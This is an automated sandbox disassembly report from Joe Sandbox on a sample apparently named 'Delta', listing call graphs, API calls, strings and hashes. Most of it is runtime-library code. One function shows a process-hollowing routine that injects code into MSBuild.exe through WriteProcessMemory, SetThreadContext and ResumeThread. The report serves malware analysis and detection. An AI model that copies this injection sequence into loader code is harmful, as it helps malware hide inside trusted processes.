__dosmaperr 14 API calls 21230->21232 21234 602e22 21231->21234 21235 602e0d 21231->21235 21233 602dce 21232->21233 21236 5f1314 __Wcrtomb 14 API calls 21233->21236 21253 5fd018 EnterCriticalSection 21234->21253 21238 5f1327 __dosmaperr 14 API calls 21235->21238 21240 602dd6 21236->21240 21237->21215 21237->21217 21241 602e12 21238->21241 21247 5f19ff __strnicoll 29 API calls 21240->21247 21245 5f1314 __Wcrtomb 14 API calls 21241->21245 21242 602e28 21243 602e47 21242->21243 21244 602e5c 21242->21244 21246 5f1314 __Wcrtomb 14 API calls 21243->21246 21254 602e9c 21244->21254 21245->21240 21249 602e4c 21246->21249 21247->21237 21251 5f1327 __dosmaperr 14 API calls 21249->21251 21250 602e57 21317 602e94 21250->21317 21251->21250 21253->21242 21255 602ec6 21254->21255 21256 602eae 21254->21256 21258 603208 21255->21258 21263 602f09 21255->21263 21257 5f1327 __dosmaperr 14 API calls 21256->21257 21259 602eb3 21257->21259 21260 5f1327 __dosmaperr 14 API calls 21258->21260 21261 5f1314 __Wcrtomb 14 API calls 21259->21261 21262 60320d 21260->21262 21264 602ebb 21261->21264 21265 5f1314 __Wcrtomb 14 API calls 21262->21265 21263->21264 21266 602f14 21263->21266 21270 602f44 21263->21270 21264->21250 21267 602f21 21265->21267 21268 5f1327 __dosmaperr 14 API calls 21266->21268 21271 5f19ff __strnicoll 29 API calls 21267->21271 21269 602f19 21268->21269 21272 5f1314 __Wcrtomb 14 API calls 21269->21272 21273 602f5d 21270->21273 21274 602f98 21270->21274 21275 602f6a 21270->21275 21271->21264 21272->21267 21273->21275 21306 602f86 21273->21306 21277 5f56f1 __strnicoll 15 API calls 21274->21277 21276 5f1327 __dosmaperr 14 API calls 21275->21276 21278 602f6f 21276->21278 21279 602fa9 21277->21279 21280 5f1314 __Wcrtomb 14 API calls 21278->21280 21282 5f56b7 ___free_lconv_mon 14 API calls 21279->21282 21283 602f76 21280->21283 21285 602fb2 21282->21285 21286 5f19ff __strnicoll 29 API calls 21283->21286 21284 6030e4 21287 603158 21284->21287 21290 6030fd GetConsoleMode 21284->21290 21288 5f56b7 ___free_lconv_mon 14 API calls 21285->21288 21316 602f81 21286->21316 21289 60315c ReadFile 21287->21289 21292 602fb9 21288->21292 21293 6031d0 GetLastError 21289->21293 21294 603174 21289->21294 21290->21287 21291 60310e 21290->21291 21291->21289 21295 603114 ReadConsoleW 21291->21295 21296 602fc3 21292->21296 21297 602fde 21292->21297 21298 603134 21293->21298 21299 6031dd 21293->21299 21294->21293 21300 60314d 21294->21300 21295->21300 21301 60312e GetLastError 21295->21301 21303 5f1314 __Wcrtomb 14 API calls 21296->21303 21305 5fc112 31 API calls 21297->21305 21307 5f133a __dosmaperr 14 API calls 21298->21307 21298->21316 21304 5f1314 __Wcrtomb 14 API calls 21299->21304 21311 6031b0 21300->21311 21312 603199 21300->21312 21300->21316 21301->21298 21302 5f56b7 ___free_lconv_mon 14 API calls 21302->21264 21308 602fc8 21303->21308 21309 6031e2 21304->21309 21305->21306 21320 6001bf 21306->21320 21307->21316 21313 5f1327 __dosmaperr 14 API calls 21308->21313 21310 5f1327 __dosmaperr 14 API calls 21309->21310 21310->21316 21311->21316 21342 603549 21311->21342 21329 6032a5 21312->21329 21313->21316 21316->21302 21354 5fd03b LeaveCriticalSection 21317->21354 21319 602e9a 21319->21237 21321 6001d9 21320->21321 21322 6001cc 21320->21322 21325 6001e5 21321->21325 21326 5f1314 __Wcrtomb 14 API calls 21321->21326 21323 5f1314 __Wcrtomb 14 API calls 21322->21323 21324 6001d1 21323->21324 21324->21284 21325->21284 21327 600206 21326->21327 21328 5f19ff __strnicoll 29 API calls 21327->21328 21328->21324 21348 6033fc 21329->21348 21331 5f573f __strnicoll MultiByteToWideChar 21332 6033b9 21331->21332 21336 6033c2 GetLastError 21332->21336 21339 6032ed 21332->21339 21333 603347 21340 603301 21333->21340 21341 5fc112 31 API calls 21333->21341 21334 603337 21337 5f1314 __Wcrtomb 14 API calls 21334->21337 21338 5f133a __dosmaperr 14 API calls 21336->21338 21337->21339 21338->21339 21339->21316 21340->21331 21341->21340 21343 603583 21342->21343 21344 603619 ReadFile 21343->21344 21345 603614 21343->21345 21344->21345 21346 603636 21344->21346 21345->21316 21346->21345 21347 5fc112 31 API calls 21346->21347 21347->21345 21349 603430 21348->21349 21350 6034a1 ReadFile 21349->21350 21351 6032bc 21349->21351 21350->21351 21352 6034ba 21350->21352 21351->21333 21351->21334 21351->21339 21351->21340 21352->21351 21353 5fc112 31 API calls 21352->21353 21353->21351 21354->21319 21357 5f8d25 21355->21357 21364 5f8d35 21355->21364 21356 5f8d5a 21359 5f8d8e 21356->21359 21360 5f8d6b 21356->21360 21357->21356 21358 5ed5c0 _Fputc 48 API calls 21357->21358 21357->21364 21358->21356 21362 5f8e0a 21359->21362 21363 5f8db6 21359->21363 21359->21364 21367 601d02 21360->21367 21365 5f573f __strnicoll MultiByteToWideChar 21362->21365 21363->21364 21366 5f573f __strnicoll MultiByteToWideChar 21363->21366 21364->21180 21365->21364 21366->21364 21370 603ea3 21367->21370 21371 603ed1 _Fputc 21370->21371 21372 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21371->21372 21373 601d1d 21372->21373 21373->21364 21374->21165 21375->21079 21377 5f25af 21376->21377 21378 5f25c4 21376->21378 21379 5f1314 __Wcrtomb 14 API calls 21377->21379 21380 5f25d3 21378->21380 21382 5fde73 43 API calls 21378->21382 21381 5f25b4 21379->21381 21380->21086 21383 5f19ff __strnicoll 29 API calls 21381->21383 21384 5f25d0 21382->21384 21385 5f25bf 21383->21385 21384->21086 21385->21086 21389 5ed153 LeaveCriticalSection 21386->21389 21388 5f25a1 21388->21091 21389->21388 21391 5e90e3 21390->21391 21392 5e9053 21390->21392 21394 5e57b0 std::ios_base::_Init 30 API calls 21391->21394 21393 5e5850 std::ios_base::_Init 5 API calls 21392->21393 21395 5e9065 21393->21395 21396 5e90e8 21394->21396 21397 5e2b20 std::ios_base::_Init 30 API calls 21395->21397 21398 5e9070 codecvt 21397->21398 21399 5e90b1 codecvt 21398->21399 21400 5e2350 std::ios_base::_Init 29 API calls 21398->21400 21399->21095 21400->21399 21401->21105 21403 5f39b2 21402->21403 21405 5f3a22 21402->21405 21404 5f8e44 _Ungetc 29 API calls 21403->21404 21409 5f39b8 21404->21409 21406 5ff40f _Ungetc 14 API calls 21405->21406 21407 5f3967 21405->21407 21406->21407 21413 5f3992 21407->21413 21408 5f3a0a 21410 5f1314 __Wcrtomb 14 API calls 21408->21410 21409->21405 21409->21408 21411 5f3a0f 21410->21411 21412 5f19ff __strnicoll 29 API calls 21411->21412 21412->21407 21416 5ed153 LeaveCriticalSection 21413->21416 21415 5f3998 21415->21110 21416->21415 18385 61019e 18386 6101d4 18385->18386 18386->18386 18387 610321 GetPEB 18386->18387 18388 610333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 18386->18388 18387->18388 18388->18386 18389 6103da WriteProcessMemory 18388->18389 18390 61041f 18389->18390 18391 610461 WriteProcessMemory Wow64SetThreadContext ResumeThread 18390->18391 18392 610424 WriteProcessMemory 18390->18392 18392->18390

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00610110,00610100), ref: 00610334
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00610347
                                                                                          • Wow64GetThreadContext.KERNEL32(00000100,00000000), ref: 00610365
                                                                                          • ReadProcessMemory.KERNELBASE(00000104,?,00610154,00000004,00000000), ref: 00610389
                                                                                          • VirtualAllocEx.KERNELBASE(00000104,?,?,00003000,00000040), ref: 006103B4
                                                                                          • WriteProcessMemory.KERNELBASE(00000104,00000000,?,?,00000000,?), ref: 0061040C
                                                                                          • WriteProcessMemory.KERNELBASE(00000104,00400000,?,?,00000000,?,00000028), ref: 00610457
                                                                                          • WriteProcessMemory.KERNELBASE(00000104,?,?,00000004,00000000), ref: 00610495
                                                                                          • Wow64SetThreadContext.KERNEL32(00000100,027F0000), ref: 006104D1
                                                                                          • ResumeThread.KERNELBASE(00000100), ref: 006104E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                          • API String ID: 2687962208-3857624555
                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                          • Instruction ID: 02e16dd9f9f4e85b6712791531950e924a428932104d170e5fa026572e1f4f4c
                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                          • Instruction Fuzzy Hash: BBB1097664064AAFDB60CF68CC80BDA73A5FF88714F198124EA0CAB341D774FA51CB94

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AddressCloseCreateHandleProcSize
                                                                                          • String ID: CreateFileA
                                                                                          • API String ID: 2547132502-1429953656
                                                                                          • Opcode ID: 43a39ca2659ae7be94aa29b137bdbbf48d759c44551d826959600d8fc82c4106
                                                                                          • Instruction ID: 6986dcfe0d8e1599af8535b7e7604fa7874961985838fb59a04330f5c92b3deb
                                                                                          • Opcode Fuzzy Hash: 43a39ca2659ae7be94aa29b137bdbbf48d759c44551d826959600d8fc82c4106
                                                                                          • Instruction Fuzzy Hash: 7141C4B0D086499FCB04EFA9D9587AEBBF1FF48310F008929E899A7350D7749944CF96

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 42 5f6642-5f664e 43 5f66e0-5f66e3 42->43 44 5f66e9 43->44 45 5f6653-5f6664 43->45 46 5f66eb-5f66ef 44->46 47 5f6666-5f6669 45->47 48 5f6671-5f668a LoadLibraryExW 45->48 49 5f666f 47->49 50 5f6709-5f670b 47->50 51 5f668c-5f6695 GetLastError 48->51 52 5f66f0-5f6700 48->52 54 5f66dd 49->54 50->46 55 5f66ce-5f66db 51->55 56 5f6697-5f66a9 call 5f9d04 51->56 52->50 53 5f6702-5f6703 FreeLibrary 52->53 53->50 54->43 55->54 56->55 59 5f66ab-5f66bd call 5f9d04 56->59 59->55 62 5f66bf-5f66cc LoadLibraryExW 59->62 62->52 62->55
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,843561DF,?,005F6751,00000000,00000000,00000000,00000000), ref: 005F6703
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3664257935-537541572
                                                                                          • Opcode ID: e4361c61162e2197c4d2be06aa5c728d44acf1c7917ee5a044551af26d56da9c
                                                                                          • Instruction ID: 2a5bc32e00e3202828035def8b3bafd340d309685caeaaeec9a644a70e48b0c9
                                                                                          • Opcode Fuzzy Hash: e4361c61162e2197c4d2be06aa5c728d44acf1c7917ee5a044551af26d56da9c
                                                                                          • Instruction Fuzzy Hash: D9210A32A41229ABD7319BA4DC44A7B3B69FB41760F251524FF15E7290EB38ED00C6E0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressConsoleFreeHandleModuleProc
                                                                                          • String ID: FreeConsole$kernel32.dll
                                                                                          • API String ID: 1635486814-2564406000
                                                                                          • Opcode ID: 426ce22b5a1ebcd5549ef36166e85214c1d03e6d021dfc12d4d56f0baf65c1aa
                                                                                          • Instruction ID: 96214aac2f04c2c701bbd9b9cfbe4e17354a7291698fb64a77b98febaf78c76e
                                                                                          • Opcode Fuzzy Hash: 426ce22b5a1ebcd5549ef36166e85214c1d03e6d021dfc12d4d56f0baf65c1aa
                                                                                          • Instruction Fuzzy Hash: CE01C970E002089FCB04EFB9D94959EBBF5BF48300F40896AE859D7351EB74A644CF82

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 68 5f6e2a-5f6e43 69 5f6e59-5f6e5e 68->69 70 5f6e45-5f6e55 call 5ef15d 68->70 71 5f6e6b-5f6e91 call 5f573f 69->71 72 5f6e60-5f6e68 69->72 70->69 77 5f6e57 70->77 78 5f7007-5f7018 call 5e71d1 71->78 79 5f6e97-5f6ea2 71->79 72->71 77->69 80 5f6ffa 79->80 81 5f6ea8-5f6ead 79->81 85 5f6ffc 80->85 83 5f6eaf-5f6eb8 call 5e9f70 81->83 84 5f6ec6-5f6ed1 call 5f56f1 81->84 83->85 93 5f6ebe-5f6ec4 83->93 84->85 95 5f6ed7 84->95 88 5f6ffe-5f7005 call 5e9f07 85->88 88->78 96 5f6edd-5f6ee2 93->96 95->96 96->85 97 5f6ee8-5f6efd call 5f573f 96->97 97->85 100 5f6f03-5f6f15 call 5f64f3 97->100 102 5f6f1a-5f6f1e 100->102 102->85 103 5f6f24-5f6f2c 102->103 104 5f6f2e-5f6f33 103->104 105 5f6f66-5f6f72 103->105 104->88 106 5f6f39-5f6f3b 104->106 107 5f6fef 105->107 108 5f6f74-5f6f76 105->108 106->85 110 5f6f41-5f6f5b call 5f64f3 106->110 109 5f6ff1-5f6ff8 call 5e9f07 107->109 111 5f6f8b-5f6f96 call 5f56f1 108->111 112 5f6f78-5f6f81 call 5e9f70 108->112 109->85 110->88 123 5f6f61 110->123 111->109 122 5f6f98 111->122 112->109 121 5f6f83-5f6f89 112->121 124 5f6f9e-5f6fa3 121->124 122->124 123->85 124->109 125 5f6fa5-5f6fbd call 5f64f3 124->125 125->109 128 5f6fbf-5f6fc6 125->128 129 5f6fc8-5f6fc9 128->129 130 5f6fe7-5f6fed 128->130 131 5f6fca-5f6fdc call 5f5801 129->131 130->131 131->109 134 5f6fde-5f6fe5 call 5e9f07 131->134 134->88
                                                                                          APIs
                                                                                          • __alloca_probe_16.LIBCMT ref: 005F6EAF
                                                                                          • __alloca_probe_16.LIBCMT ref: 005F6F78
                                                                                          • __freea.LIBCMT ref: 005F6FDF
                                                                                            • Part of subcall function 005F56F1: RtlAllocateHeap.NTDLL(00000000,005F7675,?,?,005F7675,00000220,?,?,?), ref: 005F5723
                                                                                          • __freea.LIBCMT ref: 005F6FF2
                                                                                          • __freea.LIBCMT ref: 005F6FFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1423051803-0
                                                                                          • Opcode ID: 078abe79dcc968abb5331647d544cf342e117b07c6028593858e1886c3896ebd
                                                                                          • Instruction ID: ea72bfb2470543296d752697694f77274cfc3a4a94817bb500140f48c0ee1720
                                                                                          • Opcode Fuzzy Hash: 078abe79dcc968abb5331647d544cf342e117b07c6028593858e1886c3896ebd
                                                                                          • Instruction Fuzzy Hash: 3B51BE7260028FAFEB259E65EC85EBB3EA9FF84750B150139FF04D6110EB39DC1086A0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 137 5e1db0-5e1e7e call 5e1000 * 2 GetProcAddress 142 5e1e8f-5e1ecb VirtualProtect 137->142 143 5e1e84-5e1e8c 137->143 145 5e1edc-5e1ef3 call 5e71d1 142->145 146 5e1ed1-5e1ed7 call 5e1bd0 142->146 143->142 146->145
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProcProtectVirtual
                                                                                          • String ID: @$VirtualProtect
                                                                                          • API String ID: 3759838892-29487290
                                                                                          • Opcode ID: ef662801e9a3caeed514c05031082ae1760193824657c7a6866493b93cb79daa
                                                                                          • Instruction ID: 1086a75041c97ed012a79893b0f28709ea4f1e022f9178b876c2706ce84d7607
                                                                                          • Opcode Fuzzy Hash: ef662801e9a3caeed514c05031082ae1760193824657c7a6866493b93cb79daa
                                                                                          • Instruction Fuzzy Hash: 0A41D2B0901209DFDB04DFA9D9986DEBBF1FF48344F10881AE858AB350D7759A84CF85

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(005EF1A0,?,005EF355,00000000,?,?,005EF1A0,843561DF,?,005EF1A0), ref: 005EF2A4
                                                                                          • TerminateProcess.KERNEL32(00000000,?,005EF355,00000000,?,?,005EF1A0,843561DF,?,005EF1A0), ref: 005EF2AB
                                                                                          • ExitProcess.KERNEL32 ref: 005EF2BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: 2e6b8d4978a3d958b5580f99b07e83fd068deec6f88ec18e2f6cb85d1ddb6786
                                                                                          • Instruction ID: 6b44e83d5ffdc975f0a83ab10e715098952af52b5b0b10be574a06b1cdd56460
                                                                                          • Opcode Fuzzy Hash: 2e6b8d4978a3d958b5580f99b07e83fd068deec6f88ec18e2f6cb85d1ddb6786
                                                                                          • Instruction Fuzzy Hash: 76D06C36040199ABCF092FA2DC0D95A3F6ABF84391B549824BA495A071CF7299929B90

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 157 5fd3a4-5fd3c6 158 5fd3cc-5fd3ce 157->158 159 5fd5b9 157->159 161 5fd3fa-5fd41d 158->161 162 5fd3d0-5fd3ef call 5f1ba8 158->162 160 5fd5bb-5fd5bf 159->160 163 5fd41f-5fd421 161->163 164 5fd423-5fd429 161->164 170 5fd3f2-5fd3f5 162->170 163->164 166 5fd42b-5fd43c 163->166 164->162 164->166 168 5fd44f-5fd45f call 5fd6d1 166->168 169 5fd43e-5fd44c call 5fc152 166->169 175 5fd4a8-5fd4ba 168->175 176 5fd461-5fd467 168->176 169->168 170->160 177 5fd4bc-5fd4c2 175->177 178 5fd511-5fd531 WriteFile 175->178 179 5fd469-5fd46c 176->179 180 5fd490-5fd4a6 call 5fd74e 176->180 184 5fd4fd-5fd50a call 5fdb7d 177->184 185 5fd4c4-5fd4c7 177->185 181 5fd53c 178->181 182 5fd533-5fd539 GetLastError 178->182 186 5fd46e-5fd471 179->186 187 5fd477-5fd486 call 5fdb15 179->187 196 5fd489-5fd48b 180->196 189 5fd53f-5fd54a 181->189 182->181 195 5fd50f 184->195 190 5fd4e9-5fd4fb call 5fdd41 185->190 191 5fd4c9-5fd4cc 185->191 186->187 192 5fd551-5fd554 186->192 187->196 197 5fd54c-5fd54f 189->197 198 5fd5b4-5fd5b7 189->198 203 5fd4e4-5fd4e7 190->203 199 5fd557-5fd559 191->199 200 5fd4d2-5fd4df call 5fdc58 191->200 192->199 195->203 196->189 197->192 198->160 204 5fd55b-5fd560 199->204 205 5fd587-5fd593 199->205 200->203 203->196 208 5fd579-5fd582 call 5f13a0 204->208 209 5fd562-5fd574 204->209 210 5fd59d-5fd5af 205->210 211 5fd595-5fd59b 205->211 208->170 209->170 210->170 211->159 211->210
                                                                                          APIs
                                                                                            • Part of subcall function 005FD74E: GetConsoleOutputCP.KERNEL32(843561DF,00000000,00000000,?), ref: 005FD7B1
                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,005ED832,?,005EDA94), ref: 005FD529
                                                                                          • GetLastError.KERNEL32(?,005ED832,?,005EDA94,?,005EDA94,?,?,?,?,?,?,?,00000000,?,?), ref: 005FD533
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                          • String ID:
                                                                                          • API String ID: 2915228174-0
                                                                                          • Opcode ID: 48993f109a27143f9e2d5b52ad13422b518139006399f7bb097f9e57665d25ba
                                                                                          • Instruction ID: d161c057f4b88e925bc8958c55a7d4a86307e1f08b8b6551fc077e2566175824
                                                                                          • Opcode Fuzzy Hash: 48993f109a27143f9e2d5b52ad13422b518139006399f7bb097f9e57665d25ba
                                                                                          • Instruction Fuzzy Hash: 3561817290011EABDF11DFA8C888AFEBFBABF49308F140545EA04A7252D379D911CB71

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 214 5f72a8-5f72d0 call 5f74ad 217 5f72d6-5f72dc 214->217 218 5f7495-5f7496 call 5f751e 214->218 220 5f72df-5f72e5 217->220 221 5f749b-5f749d 218->221 222 5f72eb-5f72f7 220->222 223 5f73e1-5f7400 call 5ec690 220->223 225 5f749e-5f74ac call 5e71d1 221->225 222->220 226 5f72f9-5f72ff 222->226 231 5f7403-5f7408 223->231 229 5f73d9-5f73dc 226->229 230 5f7305-5f7311 IsValidCodePage 226->230 229->225 230->229 233 5f7317-5f731e 230->233 234 5f740a-5f740f 231->234 235 5f7445-5f744f 231->235 236 5f7340-5f734d GetCPInfo 233->236 237 5f7320-5f732c 233->237 241 5f7442 234->241 242 5f7411-5f7419 234->242 235->231 243 5f7451-5f747b call 5f77f9 235->243 239 5f734f-5f736e call 5ec690 236->239 240 5f73cd-5f73d3 236->240 238 5f7330-5f733b 237->238 244 5f748d-5f748e call 5f7837 238->244 239->238 255 5f7370-5f7377 239->255 240->218 240->229 241->235 246 5f741b-5f741e 242->246 247 5f743a-5f7440 242->247 253 5f747c-5f748b 243->253 254 5f7493 244->254 252 5f7420-5f7426 246->252 247->234 247->241 252->247 256 5f7428-5f7438 252->256 253->244 253->253 254->221 257 5f7379-5f737e 255->257 258 5f73a3-5f73a6 255->258 256->247 256->252 257->258 259 5f7380-5f7388 257->259 260 5f73ab-5f73b2 258->260 261 5f739b-5f73a1 259->261 262 5f738a-5f7391 259->262 260->260 263 5f73b4-5f73c8 call 5f77f9 260->263 261->257 261->258 264 5f7392-5f7399 